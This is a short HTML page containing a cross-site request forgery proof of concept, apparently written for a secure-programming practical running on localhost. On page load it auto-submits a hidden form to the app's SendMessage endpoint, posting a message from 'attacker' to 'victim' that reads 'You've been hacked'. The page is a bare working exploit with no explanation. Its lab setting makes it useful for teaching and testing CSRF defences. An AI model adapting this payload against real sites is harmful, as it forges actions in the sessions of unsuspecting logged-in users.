<html>
<body onload='document.CSRF.submit()'>
<form action='http://localhost:8080/SecureProgrammingPractical/SendMessage.do' method='Post' name='CSRF'>
<input type='hidden' name='recipient' value='victim' />
<input type='hidden' name='subject' value='Hi' />
<input type='hidden' name='msg' value='You’ve been hacked' />
<input type='hidden' name='sender' value='attacker' />
<input type='hidden' name='send' value='send' />
</form>
</body>
</html>